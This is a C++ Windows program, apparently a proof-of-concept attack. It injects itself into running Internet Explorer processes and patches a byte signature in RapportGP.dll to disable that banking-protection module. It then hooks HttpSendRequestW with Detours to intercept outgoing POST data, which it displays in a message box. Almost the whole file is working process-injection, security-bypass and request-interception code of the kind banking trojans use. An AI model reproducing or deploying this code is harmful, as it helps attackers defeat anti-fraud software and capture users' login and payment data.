#include <Windows.h>
#include <tlhelp32.h>
#include "detours.h" 
#include <wininet.h>

void DbgPrint(char* FormatString, ...) 
{ 
   char* dbgout = new char[1024]; 
   va_list   vaList; 

   va_start(vaList, FormatString); 
   wvsprintfA(dbgout, FormatString, vaList); 
   OutputDebugStringA(dbgout); 
   va_end(vaList); 

   delete[] dbgout; 

} 

BOOL EnablePriv()
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tkp = {0};
	BOOL ret = FALSE;
    if (OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) ) 
	{
		if (LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tkp.Privileges[0].Luid)) {
			tkp.PrivilegeCount = 1;
			tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
			if (AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof(TOKEN_PRIVILEGES),NULL,NULL))
				ret = TRUE;
		}
	}
	CloseHandle( hToken );
    return TRUE;
}
BOOL InjectToProcess(HANDLE hProcess, 
					 DWORD (WINAPI *func)(LPVOID))
{
	HMODULE hCurImage = GetModuleHandle(NULL);

	DWORD dwImageSize = ((PIMAGE_OPTIONAL_HEADER)((LPVOID)((BYTE *)(hCurImage) + ((PIMAGE_DOS_HEADER)(hCurImage))-> e_lfanew + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER))))-> SizeOfImage;

	char *pMem = (char *)VirtualAllocEx(hProcess, hCurImage, dwImageSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (pMem == NULL) 
	{
		DbgPrint("VirtualAllocEx failed with %d error", GetLastError());
		return FALSE;
	}

	DWORD dwOldProt, dwNumBytes, i;
	MEMORY_BASIC_INFORMATION mbi;

	VirtualQueryEx(hProcess, pMem, &mbi, sizeof(MEMORY_BASIC_INFORMATION));

	while (mbi.Protect!=PAGE_NOACCESS && mbi.RegionSize!=0) {
		if (!(mbi.Protect & PAGE_GUARD)) {
			for (i = 0; i < mbi.RegionSize; i += 0x1000) {
				VirtualProtectEx(hProcess, pMem + i, 0x1000, PAGE_EXECUTE_READWRITE, &dwOldProt);
				WriteProcessMemory(hProcess, pMem + i, pMem + i, 0x1000, &dwNumBytes);
			}
		}

		pMem += mbi.RegionSize;
		VirtualQueryEx(hProcess, pMem, &mbi, sizeof(MEMORY_BASIC_INFORMATION));
	}

	DWORD dwRmtThdID;

	HANDLE hRmtThd = CreateRemoteThread(hProcess, NULL, 0, func, 0, 0, &dwRmtThdID);
	if(hRmtThd == NULL) 
	{
		DbgPrint("CreateRemoteThread failed with %d error", GetLastError());
		return FALSE;
	}

	return TRUE;
}

BOOL (WINAPI *WrapperHttpSendRequestW)(HINTERNET hRequest,LPCWSTR lpszHeaders,DWORD dwHeadersLength,LPVOID lpOptional,DWORD dwOptionalLength);

BOOL WINAPI __HttpSendRequestW(
     HINTERNET hRequest,
     LPCWSTR lpszHeaders,
     DWORD dwHeadersLength,
     LPVOID lpOptional,
     DWORD dwOptionalLength
    )
{
	DWORD i = 0;
	if (dwOptionalLength)
	{
		if (dwOptionalLength > 1000)
			i = dwOptionalLength*0.75;
		LPSTR s = (LPSTR)lpOptional;
		MessageBoxA(0, &s[i], "Intercepted request", 0);
	}

	return WrapperHttpSendRequestW(hRequest, lpszHeaders, dwHeadersLength, lpOptional, dwOptionalLength); 
}

void * __cdecl operator new(size_t size)
{
	return HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size); 
}

void __cdecl operator delete(void *p)
{
	HeapFree(GetProcessHeap(), 0, p);
}

LPBYTE find_signature(HMODULE a, LPBYTE sign, SIZE_T size)
{
	PIMAGE_DOS_HEADER m_imageDosHeader = (PIMAGE_DOS_HEADER)a;
	PIMAGE_NT_HEADERS m_imageNtHeaders = (PIMAGE_NT_HEADERS)((LPBYTE)a + m_imageDosHeader->e_lfanew);
	DWORD SizeOfImage = m_imageNtHeaders->OptionalHeader.SizeOfImage;
	LPBYTE buffer = (LPBYTE)a;

	for (int i = 0; i < SizeOfImage - size; ++i)
	{
		if (memcmp(&buffer[i], sign, size) == 0)
			return &buffer[i];
	}

	return NULL;
}


DWORD WINAPI fn(LPVOID)
{
	HMODULE RapportGP = GetModuleHandle("RapportGP.dll");

	if (!RapportGP)
	{
		MessageBox(0,"Not find RapportGP","",0);
		return 0;
	}

	BYTE signature[] = {0x53, 0x8B, 0x5C, 0x24, 0x08, 0x55, 0x56, 0x8B, 0x74, 0x24, 0x14, 0x8B, 0x06, 0x8B, 0x50, 0x10, 0x57, 0x8B, 0xE9, 0x53, 0x8B, 0xCE, 0xFF, 0xD2, 0x8B, 0xF8, 0x85, 0xFF};
	BYTE __replace[] = {0x53, 0x8B, 0x5C, 0x24, 0x08, 0x55, 0x56, 0x8B, 0x74, 0x24, 0x14, 0x8B, 0x06, 0x8B, 0x50, 0x10, 0x57, 0x8B, 0xE9, 0x53, 0x8B, 0xCE, 0xFF, 0xD2, 0x31, 0xC0, 0x89, 0xC7};
	
	LPBYTE sign_addr = NULL;

	if (!(sign_addr = find_signature(RapportGP, signature, sizeof(signature))))
	{
		MessageBox(0,"error find_signature","",0);
		return 0;
	}

	DWORD old;
	VirtualProtect(sign_addr, 100, PAGE_EXECUTE_READWRITE, &old);
	memcpy(sign_addr, __replace, sizeof(signature));
	
	(FARPROC&)WrapperHttpSendRequestW = GetProcAddress(GetModuleHandle("wininet.dll"), "HttpSendRequestW");

	LPBYTE func = (LPBYTE)WrapperHttpSendRequestW;

    DetourTransactionBegin();
	DetourUpdateThread(GetCurrentThread());
	DetourAttach(&(PVOID&)WrapperHttpSendRequestW, __HttpSendRequestW);
	DetourTransactionCommit();

	return 0;
}

DWORD Inject(LPSTR lpName)
{
    HANDLE hSnapShot;

    hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    if (hSnapShot == INVALID_HANDLE_VALUE)
        return FALSE;

    PROCESSENTRY32 pe = {0};
    pe.dwSize = sizeof(PROCESSENTRY32);

    if (!Process32First(hSnapShot,&pe))
        return FALSE;

    do {
        if (lstrcmpi(pe.szExeFile,lpName) == 0)
		{
			HANDLE hIe = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe.th32ProcessID);
			if (!hIe)
			{
				DbgPrint("OpenProcess failed with %d error", GetLastError());
				continue;
			}

			InjectToProcess(hIe, &fn);

			CloseHandle(hIe);
		}
    } while (Process32Next(hSnapShot,&pe));

    return FALSE;
}


int WinMain(
    HINSTANCE hInstance,
    HINSTANCE hPrevInstance,
    LPSTR lpCmdLine,
    int nCmdShow
)
{	
	if (!EnablePriv())
	{
		DbgPrint("enable great privilege fail");
		return 0;
	}

	Inject("iexplore.exe");

	return 0;
}